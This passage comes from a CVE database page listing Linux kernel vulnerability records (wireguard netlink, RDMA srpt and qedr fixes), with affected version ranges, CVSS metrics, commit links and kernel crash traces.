              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwireguard: netlink: access device through ctx instead of peer\n\nThe previous commit fixed a bug that led to a NULL peer-\u003edevice being\ndereferenced. It\u0027s actually easier and faster performance-wise to\ninstead get the device from ctx-\u003ewg. This semantically makes more sense\ntoo, since ctx-\u003ewg-\u003epeer_allowedips.seq is compared with\nctx-\u003eallowedips_seq, basing them both in ctx. This also acts as a\ndefence in depth provision against freed peers."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:00:31.028Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/493aa6bdcffd90a4f82aa614fe4f4db0641b4068"
        },
        {
          "url": "https://git.kernel.org/stable/c/4be453271a882c8ebc28df3dbf9e4d95e6ac42f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/09c3fa70f65175861ca948cb2f0f791e666c90e5"
        },
        {
          "url": "https://git.kernel.org/stable/c/c991567e6c638079304cc15dff28748e4a3c4a37"
        },
        {
          "url": "https://git.kernel.org/stable/c/93bcc1752c69bb309f4d8cfaf960ef1faeb34996"
        },
        {
          "url": "https://git.kernel.org/stable/c/d44bd323d8bb8031eef4bdc44547925998a11e47"
        },
        {
          "url": "https://git.kernel.org/stable/c/71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f"
        }
      ],
      "title": "wireguard: netlink: access device through ctx instead of peer",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26950",
    "datePublished": "2024-05-01T05:18:29.902Z",
    "dateReserved": "2024-02-19T14:20:24.198Z",
    "dateUpdated": "2025-05-04T09:00:31.028Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26744 (GCVE-0-2024-26744)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:00 – Updated: 2025-05-04 08:55

Title

RDMA/srpt: Support specifying the srpt_service_guid parameter

Summary

In the Linux kernel, the following vulnerability has been resolved: RDMA/srpt: Support specifying the srpt_service_guid parameter Make loading ib_srpt with this parameter set work. The current behavior is that setting that parameter while loading the ib_srpt kernel module triggers the following kernel crash: BUG: kernel NULL pointer dereference, address: 0000000000000000 Call Trace: <TASK> parse_one+0x18c/0x1d0 parse_args+0xe1/0x230 load_module+0x8de/0xa60 init_module_from_file+0x8b/0xd0 idempotent_init_module+0x181/0x240 __x64_sys_finit_module+0x5a/0xb0 do_syscall_64+0x5f/0xe0 entry_SYSCALL_64_after_hwframe+0x6e/0x76

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/84f1dac960cfa210a…
	https://git.kernel.org/stable/c/e0055d6461b36bfc2…
	https://git.kernel.org/stable/c/5a5c039dac1b1b7ba…
	https://git.kernel.org/stable/c/989af2f29342a9a7c…
	https://git.kernel.org/stable/c/aee4dcfe17219fe60…
	https://git.kernel.org/stable/c/fe2a73d57319feab4…
	https://git.kernel.org/stable/c/c99a827d3cff9f84e…
	https://git.kernel.org/stable/c/fdfa083549de5d50e…

Impacted products

Vendor

Product

Version

Linux

Affected: a42d985bd5b234da8b61347a78dc3057bf7bb94d , < 84f1dac960cfa210a3b7a7522e6c2320ae91932b (git)
Affected: a42d985bd5b234da8b61347a78dc3057bf7bb94d , < e0055d6461b36bfc25a9d2ab974eef78d36a6738 (git)
Affected: a42d985bd5b234da8b61347a78dc3057bf7bb94d , < 5a5c039dac1b1b7ba3e91c791f4421052bf79b82 (git)
Affected: a42d985bd5b234da8b61347a78dc3057bf7bb94d , < 989af2f29342a9a7c7515523d879b698ac8465f4 (git)
Affected: a42d985bd5b234da8b61347a78dc3057bf7bb94d , < aee4dcfe17219fe60f2821923adea98549060af8 (git)
Affected: a42d985bd5b234da8b61347a78dc3057bf7bb94d , < fe2a73d57319feab4b3b175945671ce43492172f (git)
Affected: a42d985bd5b234da8b61347a78dc3057bf7bb94d , < c99a827d3cff9f84e1cb997b7cc6386d107aa74d (git)
Affected: a42d985bd5b234da8b61347a78dc3057bf7bb94d , < fdfa083549de5d50ebf7f6811f33757781e838c0 (git)

Linux

Affected: 3.3
Unaffected: 0 , < 3.3 (semver)
Unaffected: 4.19.308 , ≤ 4.19.* (semver)
Unaffected: 5.4.293 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26744",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-03T19:40:03.230655Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-06T21:08:27.208Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.022Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/84f1dac960cfa210a3b7a7522e6c2320ae91932b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5a5c039dac1b1b7ba3e91c791f4421052bf79b82"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/989af2f29342a9a7c7515523d879b698ac8465f4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/aee4dcfe17219fe60f2821923adea98549060af8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fe2a73d57319feab4b3b175945671ce43492172f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c99a827d3cff9f84e1cb997b7cc6386d107aa74d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fdfa083549de5d50ebf7f6811f33757781e838c0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/ulp/srpt/ib_srpt.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "84f1dac960cfa210a3b7a7522e6c2320ae91932b",
              "status": "affected",
              "version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
              "versionType": "git"
            },
            {
              "lessThan": "e0055d6461b36bfc25a9d2ab974eef78d36a6738",
              "status": "affected",
              "version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
              "versionType": "git"
            },
            {
              "lessThan": "5a5c039dac1b1b7ba3e91c791f4421052bf79b82",
              "status": "affected",
              "version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
              "versionType": "git"
            },
            {
              "lessThan": "989af2f29342a9a7c7515523d879b698ac8465f4",
              "status": "affected",
              "version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
              "versionType": "git"
            },
            {
              "lessThan": "aee4dcfe17219fe60f2821923adea98549060af8",
              "status": "affected",
              "version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
              "versionType": "git"
            },
            {
              "lessThan": "fe2a73d57319feab4b3b175945671ce43492172f",
              "status": "affected",
              "version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
              "versionType": "git"
            },
            {
              "lessThan": "c99a827d3cff9f84e1cb997b7cc6386d107aa74d",
              "status": "affected",
              "version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
              "versionType": "git"
            },
            {
              "lessThan": "fdfa083549de5d50ebf7f6811f33757781e838c0",
              "status": "affected",
              "version": "a42d985bd5b234da8b61347a78dc3057bf7bb94d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/ulp/srpt/ib_srpt.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.3"
            },
            {
              "lessThan": "3.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.308",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.293",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.308",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.293",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/srpt: Support specifying the srpt_service_guid parameter\n\nMake loading ib_srpt with this parameter set work. The current behavior is\nthat setting that parameter while loading the ib_srpt kernel module\ntriggers the following kernel crash:\n\nBUG: kernel NULL pointer dereference, address: 0000000000000000\nCall Trace:\n \u003cTASK\u003e\n parse_one+0x18c/0x1d0\n parse_args+0xe1/0x230\n load_module+0x8de/0xa60\n init_module_from_file+0x8b/0xd0\n idempotent_init_module+0x181/0x240\n __x64_sys_finit_module+0x5a/0xb0\n do_syscall_64+0x5f/0xe0\n entry_SYSCALL_64_after_hwframe+0x6e/0x76"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:55:30.832Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/84f1dac960cfa210a3b7a7522e6c2320ae91932b"
        },
        {
          "url": "https://git.kernel.org/stable/c/e0055d6461b36bfc25a9d2ab974eef78d36a6738"
        },
        {
          "url": "https://git.kernel.org/stable/c/5a5c039dac1b1b7ba3e91c791f4421052bf79b82"
        },
        {
          "url": "https://git.kernel.org/stable/c/989af2f29342a9a7c7515523d879b698ac8465f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/aee4dcfe17219fe60f2821923adea98549060af8"
        },
        {
          "url": "https://git.kernel.org/stable/c/fe2a73d57319feab4b3b175945671ce43492172f"
        },
        {
          "url": "https://git.kernel.org/stable/c/c99a827d3cff9f84e1cb997b7cc6386d107aa74d"
        },
        {
          "url": "https://git.kernel.org/stable/c/fdfa083549de5d50ebf7f6811f33757781e838c0"
        }
      ],
      "title": "RDMA/srpt: Support specifying the srpt_service_guid parameter",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26744",
    "datePublished": "2024-04-03T17:00:33.280Z",
    "dateReserved": "2024-02-19T14:20:24.168Z",
    "dateUpdated": "2025-05-04T08:55:30.832Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26743 (GCVE-0-2024-26743)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:00 – Updated: 2025-05-04 08:55

Title

RDMA/qedr: Fix qedr_create_user_qp error flow

Summary

In the Linux kernel, the following vulnerability has been resolved: RDMA/qedr: Fix qedr_create_user_qp error flow Avoid the following warning by making sure to free the allocated resources in case that qedr_init_user_queue() fail. -----------[ cut here ]----------- WARNING: CPU: 0 PID: 143192 at drivers/infiniband/core/rdma_core.c:874 uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs] Modules linked in: tls target_core_user uio target_core_pscsi target_core_file target_core_iblock ib_srpt ib_srp scsi_transport_srp nfsd nfs_acl rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs 8021q garp mrp stp llc ext4 mbcache jbd2 opa_vnic ib_umad ib_ipoib sunrpc rdma_ucm ib_isert iscsi_target_mod target_core_mod ib_iser libiscsi scsi_transport_iscsi rdma_cm iw_cm ib_cm hfi1 intel_rapl_msr intel_rapl_common mgag200 qedr sb_edac drm_shmem_helper rdmavt x86_pkg_temp_thermal drm_kms_helper intel_powerclamp ib_uverbs coretemp i2c_algo_bit kvm_intel dell_wmi_descriptor ipmi_ssif sparse_keymap kvm ib_core rfkill syscopyarea sysfillrect video sysimgblt irqbypass ipmi_si ipmi_devintf fb_sys_fops rapl iTCO_wdt mxm_wmi iTCO_vendor_support intel_cstate pcspkr dcdbas intel_uncore ipmi_msghandler lpc_ich acpi_power_meter mei_me mei fuse drm xfs libcrc32c qede sd_mod ahci libahci t10_pi sg crct10dif_pclmul crc32_pclmul crc32c_intel qed libata tg3 ghash_clmulni_intel megaraid_sas crc8 wmi [last unloaded: ib_srpt] CPU: 0 PID: 143192 Comm: fi_rdm_tagged_p Kdump: loaded Not tainted 5.14.0-408.el9.x86_64 #1 Hardware name: Dell Inc. PowerEdge R430/03XKDV, BIOS 2.14.0 01/25/2022 RIP: 0010:uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs] Code: 5d 41 5c 41 5d 41 5e e9 0f 26 1b dd 48 89 df e8 67 6a ff ff 49 8b 86 10 01 00 00 48 85 c0 74 9c 4c 89 e7 e8 83 c0 cb dd eb 92 <0f> 0b eb be 0f 0b be 04 00 00 00 48 89 df e8 8e f5 ff ff e9 6d ff RSP: 0018:ffffb7c6cadfbc60 EFLAGS: 00010286 RAX: ffff8f0889ee3f60 RBX: ffff8f088c1a5200 RCX: 00000000802a0016 RDX: 00000000802a0017 RSI: 0000000000000001 RDI: ffff8f0880042600 RBP: 0000000000000001 R08: 0000000000000001 R09: 0000000000000000 R10: ffff8f11fffd5000 R11: 0000000000039000 R12: ffff8f0d5b36cd80 R13: ffff8f088c1a5250 R14: ffff8f1206d91000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff8f11d7c00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000147069200e20 CR3: 00000001c7210002 CR4: 00000000001706f0 Call Trace: <TASK> ? show_trace_log_lvl+0x1c4/0x2df ? show_trace_log_lvl+0x1c4/0x2df ? ib_uverbs_close+0x1f/0xb0 [ib_uverbs] ? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs] ? __warn+0x81/0x110 ? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs] ? report_bug+0x10a/0x140 ? handle_bug+0x3c/0x70 ? exc_invalid_op+0x14/0x70 ? asm_exc_invalid_op+0x16/0x20 ? uverbs_destroy_ufile_hw+0xcf/0xf0 [ib_uverbs] ib_uverbs_close+0x1f/0xb0 [ib_uverbs] __fput+0x94/0x250 task_work_run+0x5c/0x90 do_exit+0x270/0x4a0 do_group_exit+0x2d/0x90 get_signal+0x87c/0x8c0 arch_do_signal_or_restart+0x25/0x100 ? ib_uverbs_ioctl+0xc2/0x110 [ib_uverbs] exit_to_user_mode_loop+0x9c/0x130 exit_to_user_mode_prepare+0xb6/0x100 syscall_exit_to_user_mode+0x12/0x40 do_syscall_64+0x69/0x90 ? syscall_exit_work+0x103/0x130 ? syscall_exit_to_user_mode+0x22/0x40 ? do_syscall_64+0x69/0x90 ? syscall_exit_work+0x103/0x130 ? syscall_exit_to_user_mode+0x22/0x40 ? do_syscall_64+0x69/0x90 ? do_syscall_64+0x69/0x90 ? common_interrupt+0x43/0xa0 entry_SYSCALL_64_after_hwframe+0x72/0xdc RIP: 0033:0x1470abe3ec6b Code: Unable to access opcode bytes at RIP 0x1470abe3ec41. RSP: 002b:00007fff13ce9108 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 RAX: fffffffffffffffc RBX: 00007fff13ce9218 RCX: 00001470abe3ec6b RDX: 00007fff13ce9200 RSI: 00000000c0181b01 RDI: 0000000000000004 RBP: 00007fff13ce91e0 R08: 0000558d9655da10 R09: 0000558d9655dd00 R10: 00007fff13ce95c0 R11: 0000000000000246 R12: 00007fff13ce9358 R13: 0000000000000013 R14: 0000558d9655db50 R15: 00007fff13ce9470 </TASK> --[ end trace 888a9b92e04c5c97 ]--

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5639414a52a29336f…
	https://git.kernel.org/stable/c/135e5465fefa463c5…
	https://git.kernel.org/stable/c/7f31a244c753aacf4…
	https://git.kernel.org/stable/c/95175dda017cd4982…
	https://git.kernel.org/stable/c/bab8875c06ebda5e0…
	https://git.kernel.org/stable/c/5ba4e6d5863c53e93…

Impacted products

Vendor

Product

Version

Linux

Affected: df15856132bc837b512caa36d2227d2350cf64d8 , < 5639414a52a29336ffa1ede80a67c6d927acbc5a (git)
Affected: df15856132bc837b512caa36d2227d2350cf64d8 , < 135e5465fefa463c5ec93c4eede48b9fedac894a (git)
Affected: df15856132bc837b512caa36d2227d2350cf64d8 , < 7f31a244c753aacf40b71d01f03ca6742f81bbbc (git)
Affected: df15856132bc837b512caa36d2227d2350cf64d8 , < 95175dda017cd4982cd47960536fa1de003d3298 (git)
Affected: df15856132bc837b512caa36d2227d2350cf64d8 , < bab8875c06ebda5e01c5c4cab30022aed85c14e6 (git)
Affected: df15856132bc837b512caa36d2227d2350cf64d8 , < 5ba4e6d5863c53e937f49932dee0ecb004c65928 (git)

Linux

Affected: 4.11
Unaffected: 0 , < 4.11 (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26743",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T19:28:14.309187Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T19:28:21.844Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.229Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5639414a52a29336ffa1ede80a67c6d927acbc5a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/135e5465fefa463c5ec93c4eede48b9fedac894a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7f31a244c753aacf40b71d01f03ca6742f81bbbc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/95175dda017cd4982cd47960536fa1de003d3298"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bab8875c06ebda5e01c5c4cab30022aed85c14e6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5ba4e6d5863c53e937f49932dee0ecb004c65928"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/hw/qedr/verbs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5639414a52a29336ffa1ede80a67c6d927acbc5a",
              "status": "affected",
              "version": "df15856132bc837b512caa36d2227d2350cf64d8",
              "versionType": "git"
            },
            {
              "lessThan": "135e5465fefa463c5ec93c4eede48b9fedac894a",
              "status": "affected",
              "version": "df15856132bc837b512caa36d2227d2350cf64d8",
              "versionType": "git"
            },
            {
              "lessThan": "7f31a244c753aacf40b71d01f03ca6742f81bbbc",
              "status": "affected",
              "version": "df15856132bc837b512caa36d2227d2350cf64d8",
              "versionType": "git"
            },
            {
              "lessThan": "95175dda017cd4982cd47960536fa1de003d3298",
              "status": "affected",
              "version": "df15856132bc837b512caa36d2227d2350cf64d8",
              "versionType": "git"
            },
            {
              "lessThan": "bab8875c06ebda5e01c5c4cab30022aed85c14e6",
              "status": "affected",
              "version": "df15856132bc837b512caa36d2227d2350cf64d8",
              "versionType": "git"
            },
            {
              "lessThan": "5ba4e6d5863c53e937f49932dee0ecb004c65928",
              "status": "affected",
              "version": "df15856132bc837b512caa36d2227d2350cf64d8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/hw/qedr/verbs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.11"
            },
            {
              "lessThan": "4.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
